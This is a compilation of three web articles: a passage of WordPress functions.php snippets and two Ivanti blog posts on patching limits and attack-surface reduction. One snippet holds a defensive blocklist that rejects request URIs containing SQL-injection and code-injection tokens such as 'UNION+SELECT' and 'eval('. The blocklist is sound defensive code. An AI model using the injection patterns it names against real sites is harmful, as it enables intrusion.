        // Optionally send search requests to a 404 page.
        if ( $error == true ) {
            $query->is_404 = true;
        }
    }
}
add_action( 'parse_query', 'fb_filter_query' );
// create_function() was removed in PHP 8; __return_null() keeps the
// original behavior of returning nothing for the search form.
add_filter( 'get_search_form', '__return_null' );

4. Protect Your Site from Malicious Requests

There are various ways to secure your website. You can install a security plugin, turn on a firewall or opt for a free feature such as Jetpack Protect that blocks brute force attacks on your website.

The following code snippet, once placed in your functions.php file, rejects all malicious URL requests:

// Inspect every request unless it comes from a logged-in administrator.
global $user_ID;
if ( ! $user_ID || ! current_user_can( 'administrator' ) ) {
    if ( strlen( $_SERVER['REQUEST_URI'] ) > 255 ||
        stripos( $_SERVER['REQUEST_URI'], 'eval(' ) !== false ||
        stripos( $_SERVER['REQUEST_URI'], 'CONCAT' ) !== false ||
        stripos( $_SERVER['REQUEST_URI'], 'UNION+SELECT' ) !== false ||
        stripos( $_SERVER['REQUEST_URI'], 'base64' ) !== false ) {
            @header( 'HTTP/1.1 414 Request-URI Too Long' );
            @header( 'Status: 414 Request-URI Too Long' );
            @header( 'Connection: Close' );
            exit;
    }
}

5. Paginate Your Site Without Plugins

Good pagination is far more useful for letting users browse through your website than bare “previous” and “next” links. This is where another one of our code snippets for WordPress comes into play – it adds proper numbered pagination to your content.

Place this in the template file where you want the page links to appear (for example, below the post loop in index.php):

global $wp_query;
$total = $wp_query->max_num_pages;
// only bother with the rest if we have more than 1 page!
if ( $total > 1 )  {
     // get the current page
     if ( !$current_page = get_query_var('paged') )
          $current_page = 1;
     // structure of "format" depends on whether we're using pretty permalinks
     $format = empty( get_option('permalink_structure') ) ? '&page=%#%' : 'page/%#%/';
     echo paginate_links(array(
          'base' => get_pagenum_link(1) . '%_%',
          'format' => $format,
          'current' => $current_page,
          'total' => $total,
          'mid_size' => 4,
          'type' => 'list'
     ));
}

6. Disable the Admin Bar

The WordPress Admin Bar provides handy links to several key functions such as the ability to add new posts and pages, etc. However, if you find no use for it and wish to remove it, simply paste the following code snippet to your functions.php file:

// Remove the admin bar from the front end
add_filter( 'show_admin_bar', '__return_false' );
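A common variation (our sketch, not part of the original snippet) hides the bar for everyone except administrators:

// Variation: keep the admin bar for administrators, hide it for all
// other logged-in users.
add_filter( 'show_admin_bar', function () {
    return current_user_can( 'administrator' );
} );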

7. Show Post Thumbnails in RSS Feed

If you wish to show post thumbnail images in your blog’s RSS feed, the following code snippet for WordPress can be useful.

Place it in your functions.php file:

// Put post thumbnails into the RSS feed by prepending them to the content.
function wpfme_feed_post_thumbnail( $content ) {
    global $post;
    if ( has_post_thumbnail( $post->ID ) ) {
        $content = '<p>' . get_the_post_thumbnail( $post->ID ) . '</p>' . $content;
    }
    return $content;
}
add_filter( 'the_excerpt_rss', 'wpfme_feed_post_thumbnail' );
add_filter( 'the_content_feed', 'wpfme_feed_post_thumbnail' );

8. Change the Author Permalink Structure

By default, WordPress shows author profiles as yoursite.com/author/name. However, you can change that base to anything you like, such as yoursite.com/writer/name.

The following code snippet, once pasted into the functions.php file, changes the author permalink structure to “/profile/name”:

add_action( 'init', 'cng_author_base' );
function cng_author_base() {
    global $wp_rewrite;
    $author_slug = 'profile'; // change the slug name here
    $wp_rewrite->author_base = $author_slug;
}
// Afterwards, visit Settings » Permalinks once so WordPress flushes its
// rewrite rules and the new author base takes effect.

9. Automatically Link to Twitter Usernames in Content

This is especially useful if you are running a website that focuses a lot on Twitter (a viral content site, for example). The following code snippet for functions.php converts all @ mentions in your content into links to the corresponding Twitter profiles.

For example, an @happy mention in your content will be converted to a link to the Twitter account “twitter.com/happy” (“happy” being the username):

// Wrap @username mentions in posts and comments with links to the
// matching Twitter profile. Note that a mention at the very start of the
// content won't match, since the pattern requires a preceding character.
function content_twitter_mention( $content ) {
    return preg_replace( '/([^a-zA-Z0-9-_&])@([0-9a-zA-Z_]+)/', "$1<a href=\"http://twitter.com/$2\" target=\"_blank\" rel=\"nofollow\">@$2</a>", $content );
}
add_filter( 'the_content', 'content_twitter_mention' );
add_filter( 'comment_text', 'content_twitter_mention' );

10. Create a PayPal Donation Shortcode

If you are using the PayPal Donate function to accept donations from your website’s visitors, you can use this code snippet to create a shortcode, and thus make donating easier. First, paste the following in your functions.php file:

function donate_shortcode( $atts, $content = null ) {
    global $post;
    // WordPress lowercases shortcode attribute names, so use 'onhover'
    // rather than 'onHover'.
    extract( shortcode_atts( array(
        'account' => 'your-paypal-email-address',
        'for'     => $post->post_title,
        'onhover' => '',
    ), $atts ) );
    if ( empty( $content ) ) {
        $content = 'Make A Donation';
    }
    return '<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=' . $account . '&item_name=Donation for ' . $for . '" title="' . $onhover . '">' . $content . '</a>';
}
add_shortcode( 'donate', 'donate_shortcode' );

Then, you can easily use the [donate] shortcode in your posts and pages, like so:

[donate]My Text Here[/donate]


How to Add Code Snippets? 🤔

As mentioned with each code snippet, you just need to add the given snippet to the required file. Mostly, that means the functions.php file (though in some cases it can differ).

However, what if you are just not comfortable editing your theme’s files? If that is the case, have no fear. The Code Snippets plugin can help you out!

Code Snippets

Author(s): Code Snippets Pro
Current Version: 3.4.2
Last Updated: July 5, 2023
Rating: 94% | Active installs: 800,000+ | Requires WP 5.0+

It is a simple plugin that lets you add code snippets to your site without manually editing your theme's functions.php. It treats each code snippet as an individual plugin of its own: you add the code and hit save, and the rest is handled by the Code Snippets plugin.

Once you activate the plugin, you will find a Snippets menu right under “Plugins.” Head to Snippets » Add New.

Add a name for your snippet, paste the snippet in the code area, and then provide a description for your own reference. Once done, activate the snippet and you’re good to go! Even if you change the theme, the code snippet remains functional.


This way, you can add and delete code snippets as if they were posts or pages without having to edit theme files at all.

Source :
https://themeisle.com/blog/code-snippets-for-wordpress/#gref

Three Reasons Endpoint Security Can’t Stop With Just Patching

Last updated: June 14, 2023
James Saturnio
Security | Unified Endpoint Management

With remote work now commonplace, having a good cyber hygiene program is crucial for organizations that want to survive in today's threat landscape. This includes promoting a culture of individual cybersecurity awareness and deploying the right security tools, both of which are critical to the program's success.

Some of these tools include endpoint patching, endpoint detection and response (EDR) solutions and antivirus software. But considering recent cybersecurity reports, they’re no longer enough to reduce your organization’s external attack surface.

Here are three solid reasons, each illustrated by real-world situations that happened to organizations that didn't take the threat seriously.

  1. AI generated polymorphic exploits can bypass leading security tools
  2. Patching failures and patching fatigue are stifling security teams
  3. Endpoint patching only works for known devices and apps
  4. How can organizations reduce their external attack surface?

1. AI generated polymorphic exploits can bypass leading security tools

Recently, AI-generated polymorphic malware has been developed to bypass EDR and antivirus, leaving security teams with blind spots into threats and vulnerabilities.

Real-world example: ChatGPT Polymorphic Malware Evades “Leading” EDR and Antivirus Solutions

In one report, researchers created polymorphic malware by abusing ChatGPT prompts that evaded detection by antivirus software. In a similar report, researchers created a polymorphic keylogging malware that bypassed an industry-leading automated EDR solution.

These exploits achieved this by mutating their code slightly with every iteration and encrypting the malicious code without a command-and-control (C2) communications channel.

This mutation is not detectable by traditional signature-based and low-level heuristics detection engines. That creates security time gaps: a patch must be developed and released, tested for effectiveness, prioritized by the security team and finally rolled out onto affected systems by the IT (Information Technology) team.
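To make the detection problem concrete, here is a toy PHP sketch of our own (not from the reports) showing why byte-level signatures miss even trivial mutations: two payloads with identical behavior but different bytes produce completely different fingerprints.

<?php
// Toy illustration only -- no malicious behavior. Two functionally
// identical payloads that differ by a single junk comment:
$payload_v1 = 'echo "hello";';
$payload_v2 = '/* mutated */ echo "hello";';

// A signature engine that fingerprints bytes sees two unrelated files.
printf( "v1 signature: %s\n", hash( 'sha256', $payload_v1 ) );
printf( "v2 signature: %s\n", hash( 'sha256', $payload_v2 ) );

// Every mutation therefore needs a fresh signature, which is exactly the
// time gap described above.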

In all, this could mean several weeks or months where an organization will need to rely on other security tools to help them protect critical assets until the patching process is completed successfully.
 

2. Patching failures and patching fatigue are stifling security teams

Unfortunately, updates frequently break systems because patches haven't been rigorously tested. Also, some updates don't completely fix all weaknesses, leaving systems vulnerable to further attacks and requiring additional patches to fully remediate.

Real-world example: Suffolk County’s ransomware attack

The Suffolk County government in New York recently released its findings from the forensic investigation of the data breach and ransomware attack in which the Log4j vulnerability was the threat actor's entry point. The attack started back in December 2021, around the same time Apache released security patches for these vulnerabilities.

Even with updates available, patching never took place, resulting in 400 gigabytes of data being stolen including thousands of social security numbers and an initial ransom demand of $2.5 million.

The ransom was never paid, but the loss of personal data, the lost employee productivity and the subsequent investigation far outweighed what updated cyber hygiene appliances and tools, or even the final ransom demand of $500,000, would have cost. The county is still trying to recover and restore all of its systems today, having already spent $5.5 million.

Real-world example: An errant Windows server update caused me to work 24 hours straight

From personal experience, I once worked 24 hours straight because one Patch Tuesday, a Microsoft Windows server update was automatically downloaded and installed, which promptly broke authentication services between the IoT (Internet of Things) clients and the AAA (authentication, authorization and accounting) servers, grinding production to a screeching halt.

Our company's internal customer reference network, which mirrored the deployments of our largest customers, ran Microsoft servers for Active Directory Certificate Services (ADCS) and Network Policy Server (NPS), used for 802.1X EAP-TLS authentication of our IoT network devices managed over the air.

This happened a decade ago, but similar incidents have recurred in the years since, including this update from July 2017, where NPS authentication broke for wireless clients, and a repeat in May of last year.

At that time, an immediate fix for the errant patch wasn't available, so I spent the next 22 hours rebuilding the Microsoft servers for the company's enterprise public key infrastructure (PKI) and AAA services to restore normal operations. The saving grace was that we had taken the original root certificate authority offline, so that server wasn't affected by the bad update.

However, we ended up having to revoke all the identity certificates issued by the subordinate certificate authorities to thousands of devices including routers, switches, firewalls and access points and re-enroll them back into the AAA service with new identity certificates.

Learning from this experience, we disabled automatic updates for all Windows servers and took more frequent backups of critical services and data.
 

3. Endpoint patching only works for known devices and apps 

With the pandemic came the shift to Everywhere Work, where employees worked from home, often connecting their personal devices to their organization's network. This left security teams with a blind spot: shadow IT. With shadow IT, assets go unmanaged and potentially out of date, leaving insecure personal devices and leaky applications attached to the network.

The resurgence of bring your own device (BYOD) policies and the lack of company-sanctioned secure remote access quickly expanded the organization’s external attack surface, exposing other attack vectors for threat actors to exploit. 

Real-world example: LastPass’ recent breach 

LastPass is a very popular password manager that stores your passwords in an online vault. It has more than 25 million users and 100,000 businesses. Last year, LastPass experienced a massive data breach involving two security incidents.   

The second incident leveraged data stolen during the first breach to target four DevOps engineers, specifically, their home computers. One senior software developer used their personal Windows desktop to access the corporate development sandbox. The desktop also had an unpatched version of Plex Media Server (CVE-2020-5741) installed.

Plex provided a patch for this vulnerability three years ago. Threat actors used it to deliver malware, perform privilege escalation (PE) and then remote code execution (RCE), accessing LastPass cloud-based storage and stealing DevOps secrets along with multi-factor authentication (MFA) and federation databases.

“Unfortunately, the LastPass employee never upgraded their software to activate the patch,” Plex said in a statement. “For reference, the version that addressed this exploit was roughly 75 versions ago.”

If patching isn’t enough, how can organizations reduce their external attack surface?

Cyber hygiene

Employees are the weakest link in an organization's cyber hygiene program. Inevitably, they'll forget to update their personal devices, reuse the same weak password across different websites, install leaky applications, and click or tap on phishing links contained within an email, attachment or text message.

Combat this by promoting a company culture of cybersecurity awareness and practice vigilance that includes: 

• Ensuring the latest software updates are installed on their personal and corporate devices.

• Recognizing social engineering attack techniques, including the several types of phishing attacks.

• Using multi-factor authentication whenever possible.

• Installing antivirus software on desktops and mobile threat defense on mobile devices, and keeping their databases automatically updated.

Continuing education is key to promoting great cyber hygiene within your organization, especially for anti-phishing campaigns.  

Cyber hygiene tool recommendations

In cybersecurity, the saying goes, “You can't protect what you can't see!” Having a complete discovery and accurate inventory of all network-connected hardware, software and data, including shadow IT assets, is the important first step to assessing an organization's vulnerability risk profile. The asset data should feed into an enterprise endpoint patch management system.

Also, consider implementing a risk-based vulnerability management approach to prioritize the overwhelming number of vulnerabilities down to only those that pose the greatest risk to your organization. Risk-based vulnerability management solutions often include a threat intelligence feed into the patch management system.

Threat intelligence is information about known or potential threats to an organization. These threats can come from a variety of sources, like security researchers, government agencies, infrastructure vulnerability and application security scanners, internal and external penetration testing results and even threat actors themselves. 

This information, including specific patch failures and reliability reported from various crowdsourced feeds, can help organizations remove internal patch testing requirements and reduce the time gap to patch deployments to critical assets.

A unified endpoint management (UEM) platform is necessary to remotely manage and provide endpoint security to mobile devices, including shadow IT and BYOD assets.

The solution can enforce patching to the latest mobile operating system (OS) and applications, and provision email and secure remote-access profiles, including identity credentials and multi-factor authentication (MFA) methods like biometrics, smart cards, security keys, and certificate-based or token-based authentication.

The UEM solution should also integrate an AI machine learning-based mobile threat defense (MTD) solution for mobile devices, while desktops require next-generation antivirus (NGAV) with robust heuristics to detect and remediate device, network, and app threats with real-time anti-phishing protection.

And finally, to level the playing field against AI-generated malware, cyber hygiene tools will have to evolve quickly by leveraging AI guidance to keep up with the more sophisticated polymorphic attacks that are on the horizon.

Adding the solutions described above will help deter cyberattacks by putting impediments in front of threat actors, frustrating them into seeking out easier targets to victimize.

About James Saturnio

James Saturnio is the Technical Product Marketing Director for the Technical Marketing Engineering team at Ivanti. He immerses himself in all facets of cybersecurity with over 25 years’ hands-on industry experience. He is an always curious practitioner of the zero trust security framework. Prior to Ivanti, he was with MobileIron for almost 7 years as a Senior Solutions Architect and prior to that, he was at Cisco Systems for 19 years. While at Cisco, he started out as a Technical Assistance Center (TAC) Engineer and then a Technical Leader for the Security Technology and Internet of Things (IoT) business units. He is a former Service Provider and Security Cisco Certified Internetworking Expert (CCIE) and was the main architect for the IoT security architecture that is still used today by Cisco’s lighthouse IoT customers.

Source :
https://www.ivanti.com/blog/three-reasons-endpoint-security-can-t-stop-with-just-patching-or-antivirus

The 8 Best Practices for Reducing Your Organization’s Attack Surface

Last updated: June 20, 2023
Robert Waters
Security | Unified Endpoint Management | DEX

Increases in attack surface size lead to increased cybersecurity risk. Thus, logically, decreases in attack surface size lead to decreased cybersecurity risk.

While some attack surface management solutions offer remediation capabilities that aid in this effort, remediation is reactive. As with all things related to security and risk management, being proactive is preferred.

The good news is that ASM solutions aren’t the only weapons security teams have in the attack surface fight. There are many steps an organization can take to lessen the exposure of its IT environment and preempt cyberattacks.

How do I reduce my organization’s attack surface?

Unfortunately for everyone but malicious actors, there’s no eliminating your entire attack surface, but the following best practice security controls detailed in this post will help you significantly shrink it:

  1. Reduce complexity 
  2. Adopt a zero trust strategy for logical and physical access control
  3. Evolve to risk-based vulnerability management
  4. Implement network segmentation and microsegmentation
  5. Strengthen software and asset configurations
  6. Enforce policy compliance
  7. Train all employees on cybersecurity policies and best practices
  8. Improve digital employee experience (DEX)

As noted in our attack surface glossary entry, different attack vectors can technically fall under multiple types of attack surfaces — digital, physical and/or human. Similarly, many of the best practices in this post can help you reduce multiple types of attack surfaces.

For that reason, we have included a checklist along with each best practice that signifies which type(s) of attack surface a particular best practice primarily addresses.

#1: Reduce complexity

Attack surfaces addressed: digital and physical.

Reduce your cybersecurity attack surface by reducing complexity. Seems obvious, right? And it is. However, many companies have long failed at this seemingly simple step. Not because it’s not obvious, but because it hasn’t always been easy to do.

Research from Randori and ESG reveals seven in 10 organizations were compromised by an unknown, unmanaged or poorly managed internet-facing asset over the past year. Cyber asset attack surface management (CAASM) solutions enable such organizations to identify all their assets — including those that are unauthorized and unmanaged — so they can be secured, managed or even removed from the enterprise network.

Any unused or unnecessary assets, from endpoint devices to network infrastructure, should also be removed from the network and properly discarded.

The code that makes up your software applications is another area where complexity contributes to the size of your attack surface. Work with your development team to identify where opportunities exist to minimize the amount of executed code exposed to malicious actors, which will thereby also reduce your attack surface.

#2: Adopt a zero trust strategy for logical and physical access control

Attack surfaces addressed: digital and physical.

The National Institute of Standards and Technology (NIST) defines zero trust as follows:

“A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.”

In other words, for every access request, “never trust, always verify.”

Learn how Ivanti can help you adopt the NIST CSF in The NIST Cybersecurity Framework (CSF): Mapping Ivanti’s Solutions to CSF Controls

Taking a zero trust approach to logical access control reduces your organization’s attack surface — and likelihood of data breaches — by continuously verifying posture and compliance and providing least-privileged access.

And while zero trust isn't a product but a strategy, there are products that can help you implement a zero trust strategy. Chief among them are the products that make up the secure access service edge (SASE) framework.

And though it’s not typically viewed in this manner, a zero trust strategy can extend beyond logical access control to physical access control. When it comes to allowing anyone into secure areas of your facilities, remember to never trust, always verify. Mechanisms like access cards and biometrics can be used for this purpose.

#3: Evolve to risk-based vulnerability management

Attack surfaces addressed: digital.

First, the bad news: the US National Vulnerability Database (US NVD) contains over 160,000 scored vulnerabilities, and dozens more are added every day. Now, the good news: the vast majority of vulnerabilities have never been exploited, which means they can't be used to perpetrate a cyberattack and thus aren't part of your attack surface.

In fact, a ransomware research report from Securin, Cyber Security Works (CSW), Ivanti and Cyware showed only 180 of those 160,000+ vulnerabilities were trending active exploits.

Comparison of total NVD vulnerabilities vs. those that endanger an organization: only approximately 0.1% of all vulnerabilities in the US NVD are trending active exploits that pose an immediate risk to an organization.

A legacy approach to vulnerability management reliant on stale and static risk scores from the Common Vulnerability Scoring System (CVSS) won't accurately classify exploited vulnerabilities. And while the Cybersecurity & Infrastructure Security Agency Known Exploited Vulnerabilities (CISA KEV) Catalog is a step in the right direction, it's incomplete and doesn't account for the criticality of assets in an organization's environment.

A true risk-based approach is needed. Risk-based vulnerability management (RBVM) — as its name suggests — is a cybersecurity strategy that prioritizes vulnerabilities for remediation based on the risk they pose to the organization.

Read The Ultimate Guide to Risk-Based Patch Management and discover how to evolve your remediation strategy to a risk-based approach.

RBVM tools ingest data from vulnerability scanners, penetration tests, threat intelligence tools and other security sources and use it to measure risk and prioritize remediation activities.

With the intelligence from their RBVM tool in hand, organizations can then go about reducing their attack surface by remediating the vulnerabilities that pose them the most risk. Most commonly, that involves patching exploited vulnerabilities on the infrastructure side and fixing vulnerable code in the application stack.
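As a deliberately simplified sketch of that prioritization logic, the PHP below ranks vulnerabilities by a composite risk score instead of raw CVSS. The field names and weights are invented for illustration and are not taken from any RBVM product:

<?php
// Hypothetical inventory: an unexploited critical-severity flaw on a lab
// box vs. an actively exploited medium-severity flaw on a critical asset.
$vulns = array(
    array( 'cve' => 'CVE-AAAA-0001', 'cvss' => 9.8, 'exploited' => false, 'asset_criticality' => 1 ),
    array( 'cve' => 'CVE-BBBB-0002', 'cvss' => 6.5, 'exploited' => true,  'asset_criticality' => 5 ),
);

// Invented weighting: active exploitation dominates, asset criticality
// matters and CVSS mostly breaks ties.
function risk_score( $v ) {
    return ( $v['exploited'] ? 10 : 0 ) + $v['asset_criticality'] + $v['cvss'] / 10;
}

usort( $vulns, function ( $a, $b ) {
    return risk_score( $b ) <=> risk_score( $a ); // highest risk first
} );

print_r( array_column( $vulns, 'cve' ) ); // CVE-BBBB-0002 now outranks CVE-AAAA-0001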

#4: Implement network segmentation and microsegmentation

Attack surfaces addressed: digital.

Once again, borrowing from the NIST glossary, network segmentation is defined as follows:

Splitting a network into sub-networks, for example, by creating separate areas on the network which are protected by firewalls configured to reject unnecessary traffic. Network segmentation minimizes the harm of malware and other threats by isolating it to a limited part of the network.

From this definition, you can see how segmenting can reduce your attack surface by blocking attackers from certain parts of your network. While traditional network segmentation stops those attackers from moving north-south at the network level, microsegmentation stops them from moving east-west at the workload level.

More specifically, microsegmentation goes beyond network segmentation and enforces policies on a more granular basis — for example, by application or device instead of by network.

For example, it can be used to implement restrictions so an IoT device can only communicate with its application server and no other IoT devices, or to prevent someone in one department from accessing any other department’s systems.
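To illustrate that granularity, here is the IoT scenario above expressed as policy data in a short PHP sketch. The schema is entirely invented for illustration; real microsegmentation products each have their own policy language.

<?php
// Invented policy schema: rules are scoped to an individual workload
// rather than to a whole network segment.
$policy = array(
    'workload' => 'iot-sensor-*',
    'allow'    => array(
        // Only MQTT over TLS to the device's own application server.
        array( 'dst' => 'iot-app-server.internal', 'port' => 8883, 'proto' => 'tcp' ),
    ),
    'default'  => 'deny', // default-deny blocks east-west traffic to peer devices
);

// A lateral SSH attempt from one sensor to another gets denied.
$request = array( 'dst' => 'iot-sensor-42.internal', 'port' => 22, 'proto' => 'tcp' );
$allowed = false;
foreach ( $policy['allow'] as $rule ) {
    if ( $rule['dst'] === $request['dst'] && $rule['port'] === $request['port'] && $rule['proto'] === $request['proto'] ) {
        $allowed = true;
    }
}
echo $allowed ? "permit\n" : "deny\n"; // prints "deny"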

#5: Strengthen software and asset configurations

Attack surfaces addressed: digital.

Operating systems, applications and enterprise assets — such as servers and end user, network and IoT devices — typically come unconfigured or with default configurations that favor ease of deployment and use over security. According to CIS Critical Security Controls (CIS Controls) v8, the following can all be exploitable if left in their default state:

  • Basic controls
  • Open services and ports
  • Default accounts or passwords
  • Pre-configured Domain Name System (DNS) settings
  • Older (vulnerable) protocols
  • Pre-installation of unnecessary software

Clearly, such configurations increase the size of an attack surface. To remedy the situation, Control 4: Secure Configuration of Enterprise Assets and Software of CIS Controls v8 recommends developing and applying strong initial configurations, then continually managing and maintaining those configurations to avoid degrading security of software and assets.

Free resources and tools, such as the CIS Benchmarks, can help your team with this effort.

#6: Enforce policy compliance

Attack surfaces addressed: digital and human.

It’s no secret that endpoints are a major contributor to the size of most attack surfaces — especially in the age of Everywhere Work when more employees are working in hybrid and remote roles than ever before. Seven in 10 government employees now work virtually at least part of the time.

It’s hard enough getting employees to follow IT and security policies when they’re inside the office, let alone when 70% of them are spread all over the globe.

Unified endpoint management (UEM) tools ensure universal policy compliance by automatically enforcing policies. This fact should come as no surprise to IT and security professionals, many of whom consider UEM a commodity at this point. In fact, Gartner predicts that 90% of its clients will manage most of their estate with cloud-based UEM tools by just 2025.

Nonetheless, UEM is the best option for enforcing IT and security policy compliance, so I’d be remiss to omit it from this list.

Read The Ultimate Guide to Unified Endpoint Management and learn about the key business benefits and endpoint security use cases for modern UEM solutions.

Additionally, beyond compliance, modern UEM tools offer several other capabilities that can help you identify, manage and reduce your attack surface:

  • Have complete visibility into IT assets by discovering all devices on your network — a key ASM capability for organizations without a CAASM solution.
  • Provision devices with the appropriate software and access permissions, then automatically update that software as needed — no user interactions required.
  • Manage all types of devices across the entire lifecycle, from onboarding to retirement, to ensure they're properly discarded once no longer in use.
  • Automatically enforce device configurations (refer to #5: Strengthen software and asset configurations to learn more about the importance of this capability).
  • Support zero trust access and contextual authentication, vulnerability, policy, configuration and data management by integrating with identity, security and remote-access tools. For example, UEM and mobile threat defense (MTD) tools can integrate to enable you to enact risk-based policies to protect mobile devices from compromising the corporate network and its assets.

#7: Train all employees on cybersecurity policies and best practices

Attack surfaces addressed: human.

Seventy-four percent of breaches analyzed for the 2023 Verizon Data Breach Investigations Report (DBIR) involved a human element.

Thus, it should come as no surprise when you review the data from Ivanti’s 2023 Government Cybersecurity Status Report and see the percentages of employees around the world that don’t believe their actions have any impact on their organization’s ability to avert cyberattacks:

Do employees think their own actions matter?

Many employees don’t believe their actions impact their organization’s ability to stay safe from cyberattacks.

In the immortal words of Alexander Pope: “To err is human…” In cybersecurity terms: until AI officially takes over, humans will remain a significant part of your attack surface. And until then, human attack surfaces must be managed and reduced wherever possible.

Thus far, the best way to do that has proven to be cybersecurity training, both on general best practices and on company-specific policies. And definitely don't forget to include a social engineering module.

Many cybersecurity practitioners agree. When the question “In your experience, what security measure has been the most successful in preventing cyberattacks and data breaches?” was posed in Reddit’s r/cybersecurity subreddit, many of the top comments referenced the need for user education:

(See, for example, the comments from Reddit users u/Forbesington, u/slybythenighttothecape, u/_DudeWhat and u/onneseen.)

To once again borrow from CIS Controls v8, Control 14: Security Awareness and Skills Training encourages organizations to do the following: “Establish and maintain a security awareness program to influence behavior among the workforce to be security conscious and properly skilled to reduce cybersecurity risks to the enterprise.”

CIS (the Center for Internet Security) also recommends leveraging freely available resources to help build a security awareness program.

Security and IT staff — not just those in non-technical roles — should also be receiving cybersecurity training relevant to their roles. In fact, according to the IT and security decision-makers surveyed by Randori and ESG for their 2022 report on The State of Attack Surface Management, providing security and IT staff with more ASM training would be the third most-effective way to improve ASM.

Ensuring partners, vendors and other third-party contractors take security training as well can also help contain your human attack surface.

#8: Improve digital employee experience (DEX)

Attack surfaces addressed: digital and human.

No matter how much cybersecurity training you provide employees, the more complex and convoluted security measures become, the more likely they are to bypass them. Sixty-nine percent of end users report struggling to navigate overly convoluted and complex security measures. Such dissatisfied users are prone to distribute data over unsecured channels, prevent the installation of security updates and deploy shadow IT.

That seems to leave IT leaders with an impossible choice: improve digital employee experience (DEX) at the cost of security or prioritize security over experience? The truth is, security and DEX are equally important to an organization’s success and resilience. In fact, according to research from Enterprise Management Associates (EMA), reducing security friction leads to far fewer breach events.

So what do you do? Ivanti’s 2022 Digital Employee Experience Report indicates IT leaders — with support from the C-suite — need to put their efforts toward providing a secure-by-design digital employee experience. While that once may have seemed like an impossible task, it’s now easier than ever thanks to an emerging market for DEX tools that help you measure and continuously improve employees’ technology experience.

Read the 2022 Digital Employee Experience Report to learn more about the role DEX plays in cybersecurity.

One area in which organizations can easily improve both security and employee experience is authentication. Annoying and inefficient to remember, enter and reset, passwords have long been the bane of end users.

On top of that, they’re extremely unsecure. Roughly half of the 4,291 data breaches not involving internal malicious activity analyzed for the 2023 Verizon DBIR were enabled through credentials — about four times the amount enabled by phishing — making them by far the most popular path into an organization’s IT estate.

Passwordless authentication software solves this problem. If you’d like to improve end user experience and reduce your attack surface in one fell swoop, deploy a passwordless authentication solution that uses FIDO2 authentication protocols. Both you and your users will rejoice when you can say goodbye to passwords written on Post-it Notes forever.

For more guidance on how to balance security with DEX, see the resources referenced throughout this post.

Additional guidance from free resources

Ivanti's suggested best practices for reducing your attack surface combine learnings from our firsthand experience with knowledge gleaned from authoritative resources.

And while these best practices will indeed greatly diminish the size of your attack surface, there’s no shortage of other steps an organization could take to combat the ever-expanding size and complexity of modern attack surfaces.

Check out free resources like those referenced above for additional guidance on shrinking your attack surface.

Next steps

So, you’ve implemented all the best practices above and you’re wondering what’s next. As with all things cybersecurity, there’s no time for standing still. Attack surfaces require constant monitoring.

You never know when the next unmanaged BYOD device will connect to your network, the next vulnerability in your CRM software will be exploited or the next employee will forget their iPhone at the bar after a team happy hour.

On top of tracking existing attack vectors, you also need to stay informed about emerging ones. For example, the recent explosion of AI models is driving substantial attack surface growth, and it’s safe to say more technologies that open the door to your IT environment are on the horizon. Stay vigilant.

About Robert Waters

Robert Waters is the Lead Product Marketing Manager for endpoint security at Ivanti. His 15 years of marketing experience in the technology industry include an early stint at a Fortune 1000 telecommunications company and a decade at a network monitoring and managed services firm.

Robert joined Ivanti in November of 2022 and now oversees all things risk-based vulnerability management and patch management.

Source :
https://www.ivanti.com/blog/the-8-best-practices-for-reducing-your-organization-s-attack-surface